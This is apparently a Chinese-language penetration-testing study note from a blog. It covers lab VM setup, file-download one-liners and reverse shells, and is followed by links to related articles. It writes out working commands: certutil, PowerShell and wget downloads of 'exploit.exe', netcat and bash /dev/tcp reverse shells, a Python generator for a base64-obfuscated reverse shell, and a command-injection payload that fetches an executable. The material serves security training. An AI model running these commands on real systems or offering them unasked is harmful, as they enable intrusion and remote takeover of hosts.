下载文章

方法一:下载谷歌插件fireshot,捕捉整个页面

方法二:使用js代码

  • f12进入控制台,粘贴如下代码
(function(){
$("#side").remove();
$("#comment_title, #comment_list, #comment_bar, #comment_form, .announce, #ad_cen, #ad_bot").remove();
$(".nav_top_2011, #header, #navigator").remove();
$(".p4course_target, .comment-box, .recommend-box, #csdn-toolbar, #tool-box").remove();
$("aside").remove();
$(".tool-box").remove();
$("#toolBarBox").remove();
$("main").css('display','content');
$("main").css('float','left');
$(".option-box").remove();
$("body").css('min-width',0);
$(".option-box").remove();
window.print();
})();
  • 如下图所示

  • 另存为pdf即可

参考链接:https://blog.csdn.net/weixin_44928129/article/details/122569120

虚拟机配置

  • 安装好vmware之后,在首选项进行如下修改

  • 创建新的虚拟机的时候,一直点下一步,创建磁盘容量的时候,选择单个文件

  • win10的镜像可以去官网下载:https://www.microsoft.com/zh-cn/software-download/windows10/,这里是详细教程https://blog.csdn.net/Jackliu200911/article/details/116548055

  注意这两步:

  

  • ubuntu20.04安装教程:https://blog.csdn.net/weixin_41805734/article/details/120698714
  • win2k8
    • 开启3389端口,远程桌面:reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul
    • 关闭防火墙
    • 在物理机win+r,输入mstsc,进行连接
  • kali官网https://www.kali.org/
  • kali的汉化
    • ctrl+alt+t,打开终端,在终端中执行dpkg-reconfigure locales
    • en_US.UTF-8 UTF-8改为不勾选,按下空格

    • 勾选zh-CN.UTF-8 UTF-8,按下回车选择第三个。若有zh_CN.GBK GBK也一起勾选上,没有就不用。

    • 重启之后,会有个提示,选择保留旧名称
  • kali开启ssh服务
    • sudo vi /etc/ssh/sshd_config
    • # PasswordAuthentication yes的“#”去掉
    • 修改PermitrootLogin prohibit-passwordPermitRootLogin yes

    • sudo service ssh restart,重启ssh服务。sudo service ssh status,查看ssh服务

渗透测试常用命令

查找文件find / -name flag ,*代表模糊查找(bash)
ps-ef | grep apt

  常用的命令:https://blog.csdn.net/weixin_43303273/article/details/83029138

  Linux:https://blog.csdn.net/liangpingguo/article/details/79140780

  cmd:https://www.cnblogs.com/air-of-code/p/6015590.html

  powershell:
        https://www.anquanke.com/post/id/87976
        https://www.anquanke.com/post/id/88851
        https://www.anquanke.com/post/id/89362

渗透测试常用名词

POC:概念验证,常指漏洞证明的代码,无害
EXP:利用,指利用系统漏洞进行攻击,每个漏洞都有其 独有 的exp,有害
Payload:有效载荷,成功exploit之后,真正再在标系统执行的代码或者指令,可用于 多个 漏洞

 参考链接:

  渗透测试专业术语:https://www.cnblogs.com/sunny11/p/13583083.html
  ATT&CK:https://attack.mitre.org/

文件下载

对于文件下载和反弹shell的命令,棱角社区能够自动生成:

棱角社区:https://forum.ywhack.com/bountytips.php?download

  • python启用临时web服务
python3 -m http.server -d / 8888
python2 -m simpleHTTPServer -d / 8888
//-d指定启用web服务的路径,python在/下启动临时的http服务,使用wget下载会下载/下的,默认路径是/root
  • Linux文件下载
wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
  • powershell文件下载
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"
  • cmd文件下载
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
copy \\127.0.0.1\files\ms10-051.exe exploit.exe

  其他不一一列举,可以在棱角社区进行查询。

防火墙

  防火墙有出站规则和入站规则,相较而言,出站规则比入站规则宽松很多。讲的通俗点,自己想出去限制少,别人想进来限制多。

反弹shell

ncat:

victim:
nc -e /bin/bash ip port //linux
nc -e cmd ip port //windows listener:
nc -lvvnp port

bash:

victim:
bash -i >& /dev/tcp/ip/port 0>&1
sh -i >& /dev/tcp/ip/port 0>&1 listener:
nc -lvvnp port

python:

#!/usr/bin/env python
# coding=utf-8
import argparse,base64 def main():
parser = argparse.ArgumentParser(description="")
parser.add_argument('-i','--ip',help='回连IP',default="127.0.0.1")
parser.add_argument('-p','--port',help='回连端口',default="3456")
args = parser.parse_args()
print(args)
ip = args.ip
port = args.port
cmd = "bash -i >/dev/tcp/"+ip+"/"+port+" 0>&1"
encoder = base64.b64encode(cmd.encode("utf-8"))
try:
print("bash -c {echo,"+encoder.decode("utf-8")+"}|{base64,-d}|{bash,-i}")
except :
print("可以使用-h参数查看帮助信息") if __name__ == '__main__':
main()
  • kali用bash弹shell,会报错zsh: 没有那个文件或目录: /dev/tcp/ip/port

    • 解决办法:sudo vi /etc/passwd,将zsh改成bash

   kali作为攻击机:172.168.10.128

   win2k8作为靶机:172.16.10.130

  • !!!靶机能够成功ping通kali,kali也能成功ping通靶机

  • 在kali上开启临时的http服务,win2k8下载kali的/root/pentest目录下的nc.exe,并且重命名为a.exe。如果不开启http服务,失败结果如下一张图。为了方便实验,将a.exe改回nc.exe

  • 正向连接

    • 情况一:防火墙开启,win2k8出站

    • 情况二:防火墙开启,kali入站,无法成功反弹shell

    • 情况三:防火墙关闭,kali入站,成功反弹shell

  • 反向连接

    • 为什么要反向连接?

      • 目标在局域网内,攻击机无法ping通目标
      • 端口占用
      • 由于防火墙等限制,目标主机只能发送请求,不能接收请求
      • ip动态改变
  • 进行网络上的修改,取消勾选箭头所示

  • win2k8靶机:172.16.10.130,物理机:192.168.0.183。内网可以访问外网,外网访问不了内网

  • 防火墙开启,无法访问内网的情况下,能成功反弹shell

思路

  • 如果有RCE,可以尝试绕过。如127.0.0.1 & wget http://ip:port/example.exe,帮目标机下载安装nc,再用ncat进行反弹
  • 直接用bash进行反弹shell

0x00.常用名词、文件下载、反弹shell的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第一天 - 操作系统&名词&文件下载&反弹SHELL&防火墙绕过

    一.专业名词 1.POC:(Proof of Concept),即概念验证.漏洞报告中的POC是一段说明或一个攻击的样例使读者能够确认这个漏洞是真实存在的. 2.EXP:exploit,即漏洞利用.对 ...

  2. 常用的一句话反弹shell总结

    文章转载来源:https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F% ...

  3. linux 常用反弹shell小记

    在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell. 1.bash反弹shell 本地开启监听 nc -lvvp 受害主机命令 bash ...

  4. Linux渗透之反弹Shell

    前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的.在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个 ...

  5. Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在 ...

  6. linux 反弹shell

    Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点. nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或 ...

  7. 渗透测试中Linux下反弹shell的认识

    最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧. 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反 ...

  8. [Shell]多姿势反弹shell

    客户端监听本地: nc -nvlp 4444 从原生的 shell 环境切换到 linux 的交互式 bash 环境: python -c 'import pty; pty.spawn("/ ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

  10. Linux 反弹shell(二)反弹shell的本质

    Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向 ...

随机推荐

  1. spring-mvc 系列:注解开发(SpringMVCConfig、SpringConfig、AbstractAnnotationConfigDispatcherServletInitializer详细配置)

    目录 一.创建初始化类,代替web.xml 二.创建SpringConfig配置类,代替Spring的配置文件 三.创建SpringMVC配置类,代替SpringMVC的配置文件 四.测试功能 使用配 ...

  2. 用python用户注册和短信验证码逻辑实现案例

    一.写代码前分析(逻辑分析OK了才可以顺利成章的敲代码): A.用户发送请求 1.注册账号(用户名不能重复)--按照需求进行判断 2.短信验证码(有效期5分钟)--对短信验证码进行保存 B.用户注册. ...

  3. CutLER:一种用于无监督目标检测和实例分割的方法

    本文分享自华为云社区<CutLER:一种用于无监督目标检测和实例分割的方法>,作者:Hint. 目标检测是计算机视觉中的一种重要任务,使AI系统感知.推理.理解目标.训练定位模型需要特别的 ...

  4. 【译】Silverlight 不会消亡 XAML for Blazor 到来

    Userware 正在使用早已消失的.令人怀念的微软 Silverlight Web 开发平台的遗留来支持其新的"XAML for Blazor"产品,该产品允许 .NET 开发人 ...

  5. 在Windows下用VScode构造shell脚本的IDE

    在linux系统中,大家可以很轻松的开发.调试shell脚本.但是,对于不熟悉linux系统 的小白或者想在Windows下开发shell脚本的人来说,这就有点不友好了.本篇文章就 教大家,在Wind ...

  6. 最火前端 Web 组态软件 (可视化)

    ​  前言: 随着物联网.大数据等技术高速发展,我们逐步向数字化.可视化的人工智能(AI)时代的方向不断迈进.智能时代是工业 4.0 时代,我国工业领域正努力从"制造"迈向&quo ...

  7. 日常Bug排查-读从库没有原子性?

    日常Bug排查系列都是一些简单Bug排查.问题虽小,但经常遇到,了解这些问题,会让我们少走点弯路,提升效率.说不定有些问题你遇到过哦:) Bug现场 业务开发同学突然问了笔者一个问题,从库读会不会没有 ...

  8. 使用Triton部署chatglm2-6b模型

    一.技术介绍 NVIDIA Triton Inference Server是一个针对CPU和GPU进行优化的云端和推理的解决方案. 支持的模型类型包括TensorRT.TensorFlow.PyTor ...

  9. Modbus动态链接库供多语言使用 | Go

    Modbus协议控制动态链接库 应用场景 基于各门语言都有各自的modbus协议库,且良莠不齐,而且在具体的框架下可能存在版本依赖问题, 而且对modbus协议存在比较多的细节处理,可以查看modbu ...

  10. open3d -- voxel_down_sample

    官网文档 parameter: Input: open3d.geometry.Pointcloud点云类 voxel_size: 体素单位长度 Return: 处理后的点云类 Description: ...